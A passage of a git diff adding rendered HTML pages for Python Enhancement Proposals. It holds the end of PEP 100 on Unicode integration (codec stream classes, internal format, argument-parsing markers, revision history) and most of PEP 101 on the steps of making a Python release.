+        self.errors = errors
+
+    def write(self,object):
+
+        """Writes the object's contents encoded to self.stream.
+        """
+        data, consumed = self.encode(object,self.errors)
+        self.stream.write(data)
+
+    def writelines(self, list):
+
+        """Writes the concatenated list of strings to the stream
+           using .write().
+        """
+        self.write(''.join(list))
+
+    def reset(self):
+
+        """Flushes and resets the codec buffers used for keeping state.
+
+           Calling this method should ensure that the data on the
+           output is put into a clean state, that allows appending
+           of new fresh data without having to rescan the whole
+           stream to recover state.
+        """
+        pass
+
+    def __getattr__(self,name, getattr=getattr):
+
+        """Inherit all other methods from the underlying stream.
+        """
+        return getattr(self.stream,name)
+
+
+class StreamReader(Codec):
+
+    def __init__(self,stream,errors='strict'):
+
+        """Creates a StreamReader instance.
+
+           stream must be a file-like object open for reading
+           (binary) data.
+
+           The StreamReader may implement different error handling
+           schemes by providing the errors keyword argument.
+           These parameters are defined:
+
+             'strict' - raise a ValueError (or a subclass)
+             'ignore' - ignore the character and continue with the next
+             'replace'- replace with a suitable replacement character;
+        """
+        self.stream = stream
+        self.errors = errors
+
+    def read(self,size=-1):
+
+        """Decodes data from the stream self.stream and returns the
+           resulting object.
+
+           size indicates the approximate maximum number of bytes
+           to read from the stream for decoding purposes.  The
+           decoder can modify this setting as appropriate.  The
+           default value -1 indicates to read and decode as much
+           as possible.  size is intended to prevent having to
+           decode huge files in one step.
+
+           The method should use a greedy read strategy meaning
+           that it should read as much data as is allowed within
+           the definition of the encoding and the given size, e.g.
+           if optional encoding endings or state markers are
+           available on the stream, these should be read too.
+        """
+        # Unsliced reading:
+        if size < 0:
+            return self.decode(self.stream.read())[0]
+
+        # Sliced reading:
+        read = self.stream.read
+        decode = self.decode
+        data = read(size)
+        i = 0
+        while 1:
+            try:
+                object, decodedbytes = decode(data)
+            except ValueError,why:
+                # This method is slow but should work under pretty
+                # much all conditions; at most 10 tries are made
+                i = i + 1
+                newdata = read(1)
+                if not newdata or i > 10:
+                    raise
+                data = data + newdata
+            else:
+                return object
+
+    def readline(self, size=None):
+
+        """Read one line from the input stream and return the
+           decoded data.
+
+           Note: Unlike the .readlines() method, this method
+           inherits the line breaking knowledge from the
+           underlying stream's .readline() method -- there is
+           currently no support for line breaking using the codec
+           decoder due to lack of line buffering.  Subclasses
+           should however, if possible, try to implement this
+           method using their own knowledge of line breaking.
+
+           size, if given, is passed as size argument to the
+           stream's .readline() method.
+        """
+        if size is None:
+            line = self.stream.readline()
+        else:
+            line = self.stream.readline(size)
+        return self.decode(line)[0]
+
+    def readlines(self, sizehint=0):
+
+        """Read all lines available on the input stream
+           and return them as list of lines.
+
+           Line breaks are implemented using the codec's decoder
+           method and are included in the list entries.
+
+           sizehint, if given, is passed as size argument to the
+           stream's .read() method.
+        """
+        if sizehint is None:
+            data = self.stream.read()
+        else:
+            data = self.stream.read(sizehint)
+        return self.decode(data)[0].splitlines(1)
+
+    def reset(self):
+
+        """Resets the codec buffers used for keeping state.
+
+           Note that no stream repositioning should take place.
+           This method is primarily intended to be able to recover
+           from decoding errors.
+
+        """
+        pass
+
+    def __getattr__(self,name, getattr=getattr):
+
+        """ Inherit all other methods from the underlying stream.
+        """
+        return getattr(self.stream,name)
+
+
+

Stream codec implementors are free to combine the StreamWriter and +StreamReader interfaces into one class. Even combining all these +with the Codec class should be possible.

+

Implementors are free to add additional methods to enhance the +codec functionality or provide extra state information needed for +them to work. The internal codec implementation will only use the +above interfaces, though.

+

It is not required by the Unicode implementation to use these base +classes, only the interfaces must match; this allows writing +Codecs as extension types.

+

As guideline, large mapping tables should be implemented using +static C data in separate (shared) extension modules. That way +multiple processes can share the same data.

+

A tool to auto-convert Unicode mapping files to mapping modules +should be provided to simplify support for additional mappings +(see References).

+
+
+

Whitespace

+

The .split() method will have to know about what is considered +whitespace in Unicode.

+
+
+

Case Conversion

+

Case conversion is rather complicated with Unicode data, since +there are many different conditions to respect. See

+
+
+

for some guidelines on implementing case conversion.

+

For Python, we should only implement the 1-1 conversions included +in Unicode. Locale dependent and other special case conversions +(see the Unicode standard file SpecialCasing.txt) should be left +to user land routines and not go into the core interpreter.

+

The methods .capitalize() and .iscapitalized() should follow the +case mapping algorithm defined in the above technical report as +closely as possible.

+
+
+

Line Breaks

+

Line breaking should be done for all Unicode characters having the +B property as well as the combinations CRLF, CR, LF (interpreted +in that order) and other special line separators defined by the +standard.

+

The Unicode type should provide a .splitlines() method which +returns a list of lines according to the above specification. See +Unicode Methods.

+
+
+

Unicode Character Properties

+

A separate module “unicodedata” should provide a compact interface +to all Unicode character properties defined in the standard’s +UnicodeData.txt file.

+

Among other things, these properties provide ways to recognize +numbers, digits, spaces, whitespace, etc.

+

Since this module will have to provide access to all Unicode +characters, it will eventually have to contain the data from +UnicodeData.txt which takes up around 600kB. For this reason, the +data should be stored in static C data. This enables compilation +as shared module which the underlying OS can shared between +processes (unlike normal Python code modules).

+

There should be a standard Python interface for accessing this +information so that other implementors can plug in their own +possibly enhanced versions, e.g. ones that do decompressing of the +data on-the-fly.

+
+
+

Private Code Point Areas

+

Support for these is left to user land Codecs and not explicitly +integrated into the core. Note that due to the Internal Format +being implemented, only the area between \uE000 and \uF8FF is +usable for private encodings.

+
+
+

Internal Format

+

The internal format for Unicode objects should use a Python +specific fixed format <PythonUnicode> implemented as ‘unsigned +short’ (or another unsigned numeric type having 16 bits). Byte +order is platform dependent.

+

This format will hold UTF-16 encodings of the corresponding +Unicode ordinals. The Python Unicode implementation will address +these values as if they were UCS-2 values. UCS-2 and UTF-16 are +the same for all currently defined Unicode character points. +UTF-16 without surrogates provides access to about 64k characters +and covers all characters in the Basic Multilingual Plane (BMP) of +Unicode.

+

It is the Codec’s responsibility to ensure that the data they pass +to the Unicode object constructor respects this assumption. The +constructor does not check the data for Unicode compliance or use +of surrogates.

+

Future implementations can extend the 32 bit restriction to the +full set of all UTF-16 addressable characters (around 1M +characters).

+

The Unicode API should provide interface routines from +<PythonUnicode> to the compiler’s wchar_t which can be 16 or 32 +bit depending on the compiler/libc/platform being used.

+

Unicode objects should have a pointer to a cached Python string +object <defenc> holding the object’s value using the <default +encoding>. This is needed for performance and internal parsing +(see Internal Argument Parsing) reasons. The buffer is filled +when the first conversion request to the <default encoding> is +issued on the object.

+

Interning is not needed (for now), since Python identifiers are +defined as being ASCII only.

+

codecs.BOM should return the byte order mark (BOM) for the format +used internally. The codecs module should provide the following +additional constants for convenience and reference (codecs.BOM +will either be BOM_BE or BOM_LE depending on the platform):

+
BOM_BE: '\376\377'
+  (corresponds to Unicode U+0000FEFF in UTF-16 on big endian
+   platforms == ZERO WIDTH NO-BREAK SPACE)
+
+BOM_LE: '\377\376'
+  (corresponds to Unicode U+0000FFFE in UTF-16 on little endian
+   platforms == defined as being an illegal Unicode character)
+
+BOM4_BE: '\000\000\376\377'
+  (corresponds to Unicode U+0000FEFF in UCS-4)
+
+BOM4_LE: '\377\376\000\000'
+  (corresponds to Unicode U+0000FFFE in UCS-4)
+
+
+

Note that Unicode sees big endian byte order as being “correct”. +The swapped order is taken to be an indicator for a “wrong” +format, hence the illegal character definition.

+

The configure script should provide aid in deciding whether Python +can use the native wchar_t type or not (it has to be a 16-bit +unsigned type).

+
+
+

Buffer Interface

+

Implement the buffer interface using the <defenc> Python string +object as basis for bf_getcharbuf and the internal buffer for +bf_getreadbuf. If bf_getcharbuf is requested and the <defenc> +object does not yet exist, it is created first.

+

Note that as special case, the parser marker “s#” will not return +raw Unicode UTF-16 data (which the bf_getreadbuf returns), but +instead tries to encode the Unicode object using the default +encoding and then returns a pointer to the resulting string object +(or raises an exception in case the conversion fails). This was +done in order to prevent accidentally writing binary data to an +output stream which the other end might not recognize.

+

This has the advantage of being able to write to output streams +(which typically use this interface) without additional +specification of the encoding to use.

+

If you need to access the read buffer interface of Unicode +objects, use the PyObject_AsReadBuffer() interface.

+

The internal format can also be accessed using the +‘unicode-internal’ codec, e.g. via u.encode('unicode-internal').

+
+
+

Pickle/Marshalling

+

Should have native Unicode object support. The objects should be +encoded using platform independent encodings.

+

Marshal should use UTF-8 and Pickle should either choose +Raw-Unicode-Escape (in text mode) or UTF-8 (in binary mode) as +encoding. Using UTF-8 instead of UTF-16 has the advantage of +eliminating the need to store a BOM mark.

+
+
+

Regular Expressions

+

Secret Labs AB is working on a Unicode-aware regular expression +machinery. It works on plain 8-bit, UCS-2, and (optionally) UCS-4 +internal character buffers.

+

Also see

+
+
+

for some remarks on how to treat Unicode REs.

+
+
+

Formatting Markers

+

Format markers are used in Python format strings. If Python +strings are used as format strings, the following interpretations +should be in effect:

+
'%s': For Unicode objects this will cause coercion of the
+      whole format string to Unicode.  Note that you should use
+      a Unicode format string to start with for performance
+      reasons.
+
+
+

In case the format string is an Unicode object, all parameters are +coerced to Unicode first and then put together and formatted +according to the format string. Numbers are first converted to +strings and then to Unicode.

+
'%s': Python strings are interpreted as Unicode
+      string using the <default encoding>.  Unicode objects are
+      taken as is.
+
+
+

All other string formatters should work accordingly.

+

Example:

+
u"%s %s" % (u"abc", "abc")  ==  u"abc abc"
+
+
+
+
+

Internal Argument Parsing

+

These markers are used by the PyArg_ParseTuple() APIs:

+
+
“U”
Check for Unicode object and return a pointer to it
+
“s”
For Unicode objects: return a pointer to the object’s +<defenc> buffer (which uses the <default encoding>).
+
“s#”
Access to the default encoded version of the Unicode object +(see Buffer Interface); note that the length relates to +the length of the default encoded string rather than the +Unicode object length.
+
“t#”
Same as “s#”.
+
“es”
Takes two parameters: encoding (const char *) and buffer +(char **).

The input object is first coerced to Unicode in the usual +way and then encoded into a string using the given +encoding.

+

On output, a buffer of the needed size is allocated and +returned through *buffer as NULL-terminated string. The +encoded may not contain embedded NULL characters. The +caller is responsible for calling PyMem_Free() to free the +allocated *buffer after usage.

+
+
“es#”
Takes three parameters: encoding (const char *), buffer +(char **) and buffer_len (int *).

The input object is first coerced to Unicode in the usual +way and then encoded into a string using the given +encoding.

+

If *buffer is non-NULL, *buffer_len must be set to +sizeof(buffer) on input. Output is then copied to *buffer.

+

If *buffer is NULL, a buffer of the needed size is +allocated and output copied into it. *buffer is then +updated to point to the allocated memory area. The caller +is responsible for calling PyMem_Free() to free the +allocated *buffer after usage.

+

In both cases *buffer_len is updated to the number of +characters written (excluding the trailing NULL-byte). +The output buffer is assured to be NULL-terminated.

+
+
+

Examples:

+

Using “es#” with auto-allocation:

+
static PyObject *
+test_parser(PyObject *self,
+            PyObject *args)
+{
+    PyObject *str;
+    const char *encoding = "latin-1";
+    char *buffer = NULL;
+    int buffer_len = 0;
+
+    if (!PyArg_ParseTuple(args, "es#:test_parser",
+                          encoding, &buffer, &buffer_len))
+        return NULL;
+    if (!buffer) {
+        PyErr_SetString(PyExc_SystemError,
+                        "buffer is NULL");
+        return NULL;
+    }
+    str = PyString_FromStringAndSize(buffer, buffer_len);
+    PyMem_Free(buffer);
+    return str;
+}
+
+
+

Using “es” with auto-allocation returning a NULL-terminated string:

+
static PyObject *
+test_parser(PyObject *self,
+            PyObject *args)
+{
+    PyObject *str;
+    const char *encoding = "latin-1";
+    char *buffer = NULL;
+
+    if (!PyArg_ParseTuple(args, "es:test_parser",
+                          encoding, &buffer))
+        return NULL;
+    if (!buffer) {
+        PyErr_SetString(PyExc_SystemError,
+                        "buffer is NULL");
+        return NULL;
+    }
+    str = PyString_FromString(buffer);
+    PyMem_Free(buffer);
+    return str;
+}
+
+
+

Using “es#” with a pre-allocated buffer:

+
static PyObject *
+test_parser(PyObject *self,
+            PyObject *args)
+{
+    PyObject *str;
+    const char *encoding = "latin-1";
+    char _buffer[10];
+    char *buffer = _buffer;
+    int buffer_len = sizeof(_buffer);
+
+    if (!PyArg_ParseTuple(args, "es#:test_parser",
+                          encoding, &buffer, &buffer_len))
+        return NULL;
+    if (!buffer) {
+        PyErr_SetString(PyExc_SystemError,
+                        "buffer is NULL");
+        return NULL;
+    }
+    str = PyString_FromStringAndSize(buffer, buffer_len);
+    return str;
+}
+
+
+
+
+

File/Stream Output

+

Since file.write(object) and most other stream writers use the +“s#” or “t#” argument parsing marker for querying the data to +write, the default encoded string version of the Unicode object +will be written to the streams (see Buffer Interface).

+

For explicit handling of files using Unicode, the standard stream +codecs as available through the codecs module should be used.

+

The codecs module should provide a short-cut +open(filename,mode,encoding) available which also assures that +mode contains the ‘b’ character when needed.

+
+
+

File/Stream Input

+

Only the user knows what encoding the input data uses, so no +special magic is applied. The user will have to explicitly +convert the string data to Unicode objects as needed or use the +file wrappers defined in the codecs module (see File/Stream +Output).

+
+
+

Unicode Methods & Attributes

+

All Python string methods, plus:

+
.encode([encoding=<default encoding>][,errors="strict"])
+   --> see Unicode Output
+
+.splitlines([include_breaks=0])
+   --> breaks the Unicode string into a list of (Unicode) lines;
+       returns the lines with line breaks included, if
+       include_breaks is true.  See Line Breaks for a
+       specification of how line breaking is done.
+
+
+
+
+

Code Base

+

We should use Fredrik Lundh’s Unicode object implementation as +basis. It already implements most of the string methods needed +and provides a well written code base which we can build upon.

+

The object sharing implemented in Fredrik’s implementation should +be dropped.

+
+
+

Test Cases

+

Test cases should follow those in Lib/test/test_string.py and +include additional checks for the Codec Registry and the Standard +Codecs.

+
+
+

References

+ +
+
+

History of this Proposal

+

[ed. note: revisions prior to 1.7 are available in the CVS history +of Misc/unicode.txt from the standard Python distribution. All +subsequent history is available via the CVS revisions on this +file.]

+
+

1.7

+
    +
  • Added note about the changed behaviour of “s#”.
  • +
+
+
+

1.6

+
    +
  • Changed <defencstr> to <defenc> since this is the name used in the +implementation.
  • +
  • Added notes about the usage of <defenc> in +the buffer protocol implementation.
  • +
+
+
+

1.5

+
    +
  • Added notes about setting the <default encoding>.
  • +
  • Fixed some typos (thanks to Andrew Kuchling).
  • +
  • Changed <defencstr> to <utf8str>.
  • +
+
+
+

1.4

+
    +
  • Added note about mixed type comparisons and contains tests.
  • +
  • Changed treating of Unicode objects in format strings (if +used with '%s' % u they will now cause the format string to +be coerced to Unicode, thus producing a Unicode object on +return).
  • +
  • Added link to IANA charset names (thanks to Lars +Marius Garshol).
  • +
  • Added new codec methods .readline(), +.readlines() and .writelines().
  • +
+
+
+

1.3

+
    +
  • Added new “es” and “es#” parser markers
  • +
+
+
+

1.2

+
    +
  • Removed POD about codecs.open()
  • +
+
+
+

1.1

+
    +
  • Added note about comparisons and hash values.
  • +
  • Added note about case mapping algorithms.
  • +
  • Changed stream codecs .read() and .write() method +to match the standard file-like object +methods (bytes consumed information is no longer returned by +the methods)
  • +
+
+
+

1.0

+
    +
  • changed encode Codec method to be symmetric to the decode method +(they both return (object, data consumed) now and thus become +interchangeable);
  • +
  • removed __init__ method of Codec class (the +methods are stateless) and moved the errors argument down to +the methods;
  • +
  • made the Codec design more generic w/r to type +of input and output objects;
  • +
  • changed StreamWriter.flush to StreamWriter.reset in order to +avoid overriding the stream’s .flush() method;
  • +
  • renamed .breaklines() to .splitlines();
  • +
  • renamed the module unicodec to codecs;
  • +
  • modified the File I/O section to refer to the stream codecs.
  • +
+
+
+

0.9

+
    +
  • changed errors keyword argument definition;
  • +
  • added ‘replace’ error handling;
  • +
  • changed the codec APIs to accept buffer like +objects on input;
  • +
  • some minor typo fixes;
  • +
  • added Whitespace section and included references for Unicode characters that +have the whitespace and the line break characteristic;
  • +
  • added note that search functions can expect lower-case encoding names;
  • +
  • dropped slicing and offsets in the codec APIs
  • +
+
+
+

0.8

+
    +
  • added encodings package and raw unicode escape encoding;
  • +
  • untabified the proposal;
  • +
  • added notes on Unicode format strings;
  • +
  • added .breaklines() method
  • +
+
+
+

0.7

+
    +
  • added a whole new set of codec APIs;
  • +
  • added a different encoder lookup scheme;
  • +
  • fixed some names
  • +
+
+
+

0.6

+
    +
  • changed “s#” to “t#”;
  • +
  • changed <defencbuf> to <defencstr> holding +a real Python string object;
  • +
  • changed Buffer Interface to +delegate requests to <defencstr>’s buffer interface;
  • +
  • removed the explicit reference to the unicodec.codecs dictionary (the +module can implement this in way fit for the purpose);
  • +
  • removed the settable default encoding;
  • +
  • move UnicodeError from unicodec to exceptions;
  • +
  • “s#” not returns the internal data;
  • +
  • passed the UCS-2/UTF-16 checking from the Unicode constructor +to the Codecs
  • +
+
+
+

0.5

+
    +
  • moved sys.bom to unicodec.BOM;
  • +
  • added sections on case mapping,
  • +
  • private use encodings and Unicode character properties
  • +
+
+
+

0.4

+
    +
  • added Codec interface, notes on %-formatting,
  • +
  • changed some encoding details,
  • +
  • added comments on stream wrappers,
  • +
  • fixed some discussion points (most important: Internal Format),
  • +
  • clarified the ‘unicode-escape’ encoding, added encoding +references
  • +
+
+
+

0.3

+
    +
  • added references, comments on codec modules, the internal format, +bf_getcharbuffer and the RE engine;
  • +
  • added ‘unicode-escape’ +encoding proposed by Tim Peters and fixed repr(u) accordingly
  • +
+
+
+

0.2

+
    +
  • integrated Guido’s suggestions, added stream codecs and file wrapping
  • +
+
+
+

0.1

+
    +
  • first version
  • +
+
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0100.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0101/index.html b/pep-0101/index.html new file mode 100644 index 00000000000..e07c7218f9e --- /dev/null +++ b/pep-0101/index.html @@ -0,0 +1,908 @@ + + + + + + + + PEP 101 – Doing Python Releases 101 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 101 – Doing Python Releases 101

+
+
Author:
+
Barry Warsaw <barry at python.org>, Guido van Rossum <guido at python.org>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
22-Aug-2001
+
Post-History:
+

+
Replaces:
+
102
+
+
+
+
Table of Contents +
+
+

Abstract

+

Making a Python release is a thrilling and crazy process. You’ve heard +the expression “herding cats”? Imagine trying to also saddle those +purring little creatures up, and ride them into town, with some of their +buddies firmly attached to your bare back, anchored by newly sharpened +claws. At least they’re cute, you remind yourself.

+

Actually, no, that’s a slight exaggeration 😉 The Python release +process has steadily improved over the years and now, with the help of our +amazing community, is really not too difficult. This PEP attempts to +collect, in one place, all the steps needed to make a Python release. +Most of the steps are now automated or guided by automation, so manually +following this list is no longer necessary.

+
+
+

Things You’ll Need

+

As a release manager there are a lot of resources you’ll need to access. +Here’s a hopefully-complete list.

+
    +
  • A GPG key.

    Python releases before 3.14 are digitally signed with GPG; for these you’ll +need a key, which hopefully will be on the “web of trust” with at least one of +the other release managers.

    +
    +

    Note

    +

    GPG instructions in this PEP can be ignored for Python 3.14 and +later. See PEP 761 for details.

    +
    +
  • +
  • A bunch of software:
      +
    • A checkout of the python/release-tools repo. +It contains a requirements.txt +file that you need to install +dependencies from first. Afterwards, you can fire up scripts in the +repo, covered later in this PEP.
    • +
    • blurb, the +Misc/NEWS +management tool. You can pip install it.
    • +
    +
  • +
  • Access to servers where you will upload files:
      +
    • downloads.nyc1.psf.io, the server that hosts download files; and
    • +
    • docs.nyc1.psf.io, the server that hosts the documentation.
    • +
    +
  • +
  • Administrator access to python/cpython.
  • +
  • An administrator account on www.python.org, including an “API key”.
  • +
  • Write access to the python/peps repository.

    If you’re reading this, you probably already have this–the first +task of any release manager is to draft the release schedule. But +in case you just signed up… sucker! I mean, uh, congratulations!

    +
  • +
  • Posting access to blog.python.org, a Blogger-hosted weblog. +The RSS feed from this blog is used for the ‘Python News’ section +on www.python.org.
  • +
  • A subscription to the super secret release manager mailing list, which may +or may not be called python-cabal. Bug Barry about this.
  • +
  • A @python.org email address that you will use to sign your releases +with. Ask postmaster@ for an address; you can either get a full +account, or a redirecting alias + SMTP credentials to send email from +this address that looks legit to major email providers.
  • +
  • Be added to the Python Security Response Team.
  • +
+
+
+

Types of Releases

+

There are several types of releases you will need to make. These include:

+
    +
  • alpha
  • +
  • begin beta, also known as beta 1, also known as new branch
  • +
  • beta 2+
  • +
  • release candidate 1
  • +
  • release candidate 2+
  • +
  • final
  • +
  • new branch
  • +
  • begin bugfix mode
  • +
  • begin security-only mode
  • +
  • end-of-life
  • +
+

Some of these release types actually involve more than +one release branch. In particular, a new branch is that point in the +release cycle when a new feature release cycle begins. Under the current +organization of the CPython Git repository, the main branch is always +the target for new features. At some point in the release cycle of the +next feature release, a new branch release is made which creates a +new separate branch for stabilization and later maintenance of the +current in-progress feature release (3.n.0) and the main branch is modified +to build a new version (which will eventually be released as 3.n+1.0). +While the new branch release step could occur at one of several points +in the release cycle, current practice is for it to occur at feature code +cutoff for the release which is scheduled for the first beta release.

+

In the descriptions that follow, steps specific to release types are +labeled accordingly, for now, new branch and final.

+
+
+

How To Make A Release

+

Here are the steps taken to make a Python release. Some steps are more +fuzzy than others because there’s little that can be automated (e.g. +writing the NEWS entries). Where a step is usually performed by An +Expert, the role of that expert is given. Otherwise, assume the step is +done by the Release Manager (RM), the designated person performing the +release. The roles and their current experts are:

+ +
+

Note

+

It is highly recommended that the RM contact the Experts the day +before the release. Because the world is round and everyone lives +in different timezones, the RM must ensure that the release tag is +created in enough time for the Experts to cut binary releases.

+

You should not make the release public (by updating the website and +sending announcements) before all experts have updated their bits. +In rare cases where the expert for Windows or Mac is MIA, you may add +a message “(Platform) binaries will be provided shortly” and proceed.

+
+

As much as possible, the release steps are automated and guided by the +release script, which is available in a separate repository: +python/release-tools.

+

We use the following conventions in the examples below. Where a release +number is given, it is of the form 3.X.YaN, e.g. 3.13.0a3 for Python 3.13.0 +alpha 3, where “a” == alpha, “b” == beta, “rc” == release candidate.

+

Release tags are named v3.X.YaN. The branch name for minor release +maintenance branches is 3.X.

+

This helps by performing several automatic editing steps, and guides you +to perform some manual editing steps.

+
    +
  • Log into Discord and join the Python Core Devs server. Ask Thomas +or Łukasz for an invite.

    You probably need to coordinate with other people around the world. +This communication channel is where we’ve arranged to meet.

    +
  • +
  • Check to see if there are any showstopper bugs.

    Go to https://github.com/python/cpython/issues and look for any open +bugs that can block this release. You’re looking at two relevant labels:

    +
    +
    release-blocker
    Stops the release dead in its tracks. You may not +make any release with any open release blocker bugs.
    +
    deferred-blocker
    Doesn’t block this release, but it will block a +future release. You may not make a final or +candidate release with any open deferred blocker +bugs.
    +
    +

    Review the release blockers and either resolve them, bump them down to +deferred, or stop the release and ask for community assistance. If +you’re making a final or candidate release, do the same with any open +deferred.

    +
  • +
  • Check the stable buildbots.

    Go to https://buildbot.python.org/all/#/release_status

    +

    Look at the buildbots for the release +you’re making. Ignore any that are offline (or inform the community so +they can be restarted). If what remains are (mostly) green buildbots, +you’re good to go. If you have non-offline red buildbots, you may want +to hold up the release until they are fixed. Review the problems and +use your judgement, taking into account whether you are making an alpha, +beta, or final release.

    +
  • +
  • Make a release clone.

    On a fork of the CPython repository on GitHub, create a release branch +within it (called the “release clone” from now on). You can use the same +GitHub fork you use for CPython development. Using the standard setup +recommended in the Python Developer’s Guide, +your fork would be referred +to as origin and the standard CPython repo as upstream. You will +use the branch on your fork to do the release engineering work, including +tagging the release, and you will use it to share with the other experts +for making the binaries.

    +

    For a final or release candidate 2+ release, if you are going +to cherry-pick a subset of changes for the next rc or final from all those +merged since the last rc, you should create a release +engineering branch starting from the most recent release candidate tag, +i.e. v3.8.0rc1. You will then cherry-pick changes from the standard +release branch as necessary into the release engineering branch and +then proceed as usual. If you are going to take all of the changes +since the previous rc, you can proceed as normal.

    +
  • +
  • Make sure the current branch of your release clone is the branch you +want to release from (git status).
  • +
  • Run blurb release <version> specifying the version number +(e.g. blurb release 3.4.7rc1). This merges all the recent news +blurbs into a single file marked with this release’s version number.
  • +
  • Regenerate Lib/pydoc-topics.py.

    While still in the Doc directory, run:

    +
    make pydoc-topics
    +cp build/pydoc-topics/topics.py ../Lib/pydoc_data/topics.py
    +
    +
    +
  • +
  • Commit your changes to pydoc_topics.py +(and any fixes you made in the docs).
  • +
  • Consider running autoconf using the currently accepted standard version +in case configure or other Autoconf-generated files were last +committed with a newer or older version and may contain spurious or +harmful differences. Currently, Autoconf 2.71 is our de facto standard. +if there are differences, commit them.
  • +
  • Make sure the SOURCE_URI in Doc/tools/extensions/pyspecific.py +points to the right branch in the Git repository (main or 3.X). +For a new branch release, change the branch in the file from main +to the new release branch you are about to create (3.X).
  • +
  • Bump version numbers via the release script:
    .../release-tools/release.py --bump 3.X.YaN
    +
    +
    +

    Reminder: X, Y, and N should be integers. +a should be one of a, b, or rc (e.g. 3.4.3rc1). +For final releases omit the aN (3.4.3). For the first +release of a new version Y should be 0 (3.6.0).

    +

    This automates updating various release numbers, but you will have to +modify a few files manually. If your $EDITOR environment variable is +set up correctly, release.py will pop up editor windows with the files +you need to edit.

    +

    Review the blurb-generated Misc/NEWS file and edit as necessary.

    +
  • +
  • Make sure all changes have been committed. (release.py --bump +doesn’t check in its changes for you.)
  • +
  • For a final major release, edit the first paragraph of +Doc/whatsnew/3.X.rst to include the actual release date; e.g. “Python +2.5 was released on August 1, 2003.” There’s no need to edit this for +alpha or beta releases.
  • +
  • Do a git status in this directory.

    You should not see any files, i.e., you better not have any uncommitted +changes in your working directory.

    +
  • +
  • Tag the release for 3.X.YaN:
    .../release-tools/release.py --tag 3.X.YaN
    +
    +
    +

    This executes a git tag command with the -s option so that the +release tag in the repo is signed with your GPG key. When prompted +choose the private key you use for signing release tarballs etc.

    +
  • +
  • For begin security-only mode and end-of-life releases, review the +two files and update the versions accordingly in all active branches.
  • +
  • Time to build the source tarball. Use the release script to create +the source gzip and xz tarballs, +documentation tar and zip files, and GPG signature files:
    .../release-tools/release.py --export 3.X.YaN
    +
    +
    +

    This can take a while for final releases, and it will leave all the +tarballs and signatures in a subdirectory called 3.X.YaN/src, and the +built docs in 3.X.YaN/docs (for final releases).

    +

    Note that the script will sign your release with Sigstore. Use +your @python.org email address for this. See here for more information: +https://www.python.org/download/sigstore/.

    +
  • +
  • Now you want to perform the very important step of checking the +tarball you just created, to make sure a completely clean, +virgin build passes the regression test. Here are the best +steps to take:
    cd /tmp
    +tar xvf /path/to/your/release/clone/<version>//Python-3.2rc2.tgz
    +cd Python-3.2rc2
    +ls
    +# (Do things look reasonable?)
    +ls Lib
    +# (Are there stray .pyc files?)
    +./configure
    +# (Loads of configure output)
    +make test
    +# (Do all the expected tests pass?)
    +
    +
    +

    If you’re feeling lucky and have some time to kill, or if you are making +a release candidate or final release, run the full test suite:

    +
    make buildbottest
    +
    +
    +

    If the tests pass, then you can feel good that the tarball is +fine. If some of the tests fail, or anything else about the +freshly unpacked directory looks weird, you better stop now and +figure out what the problem is.

    +
  • +
  • Push your commits to the remote release branch in your GitHub fork:
    # Do a dry run first.
    +git push --dry-run --tags origin
    +# Make sure you are pushing to your GitHub fork,
    +# *not* to the main python/cpython repo!
    +git push --tags origin
    +
    +
    +
  • +
  • Notify the experts that they can start building binaries.
  • +
+
+

Warning

+

STOP: at this point you must receive the “green light” from other experts +in order to create the release. There are things you can do while you wait +though, so keep reading until you hit the next STOP.

+
+
    +
  • The WE generates and publishes the Windows files using the Azure +Pipelines build scripts in .azure-pipelines/windows-release/, +currently set up at https://dev.azure.com/Python/cpython/_build?definitionId=21.

    The build process runs in multiple stages, with each stage’s output being +available as a downloadable artifact. The stages are:

    +
      +
    • Compile all variants of binaries (32-bit, 64-bit, debug/release), +including running profile-guided optimization.
    • +
    • Compile the HTML Help file containing the Python documentation.
    • +
    • Codesign all the binaries with the PSF’s certificate.
    • +
    • Create packages for python.org, nuget.org, the embeddable distro and +the Windows Store.
    • +
    • Perform basic verification of the installers.
    • +
    • Upload packages to python.org and nuget.org, purge download caches and +run a test download.
    • +
    +

    After the uploads are complete, the WE copies the generated hashes from +the build logs and emails them to the RM. The Windows Store packages are +uploaded manually to https://partner.microsoft.com/dashboard/home by the +WE.

    +
  • +
  • The ME builds Mac installer packages and uploads them to +downloads.nyc1.psf.io together with GPG signature files.
  • +
  • scp or rsync all the files built by release.py --export +to your home directory on downloads.nyc1.psf.io.

    While you’re waiting for the files to finish uploading, you can continue +on with the remaining tasks. You can also ask folks on Discord +and/or discuss.python.org to download the files as they finish uploading +so that they can test them on their platforms as well.

    +
  • +
  • Now you need to go to downloads.nyc1.psf.io and move all the files in place +over there. Our policy is that every Python version gets its own +directory, but each directory contains all releases of that version.
      +
    • On downloads.nyc1.psf.io, cd /srv/www.python.org/ftp/python/3.X.Y +creating it if necessary. Make sure it is owned by group downloads +and group-writable.
    • +
    • Move the release .tgz, and .tar.xz files into place, as well as the +.asc GPG signature files. The Win/Mac binaries are usually put there +by the experts themselves.

      Make sure they are world readable. They should also be group +writable, and group-owned by downloads.

      +
    • +
    • Use gpg --verify to make sure they got uploaded intact.
    • +
    • If this is a final or rc release: Move the doc zips and tarballs to +/srv/www.python.org/ftp/python/doc/3.X.Y[rcA], creating the directory +if necessary, and adapt the “current” symlink in .../doc to point to +that directory. Note though that if you’re releasing a maintenance +release for an older version, don’t change the current link.
    • +
    • If this is a final or rc release (even a maintenance release), also +unpack the HTML docs to /srv/docs.python.org/release/3.X.Y[rcA] on +docs.nyc1.psf.io. Make sure the files are in group docs and are +group-writeable.
    • +
    • Let the DE check if the docs are built and work all right.
    • +
    • Note both the documentation and downloads are behind a caching CDN. If +you change archives after downloading them through the website, you’ll +need to purge the stale data in the CDN like this:
      curl -X PURGE https://www.python.org/ftp/python/3.12.0/Python-3.12.0.tar.xz
      +
      +
      +

      You should always purge the cache of the directory listing as people +use that to browse the release files:

      +
      curl -X PURGE https://www.python.org/ftp/python/3.12.0/
      +
      +
      +
    • +
    +
  • +
  • For the extra paranoid, do a completely clean test of the release. +This includes downloading the tarball from www.python.org.

    Make sure the md5 checksums match. Then unpack the tarball, +and do a clean make test:

    +
    make distclean
    +./configure
    +make test
    +
    +
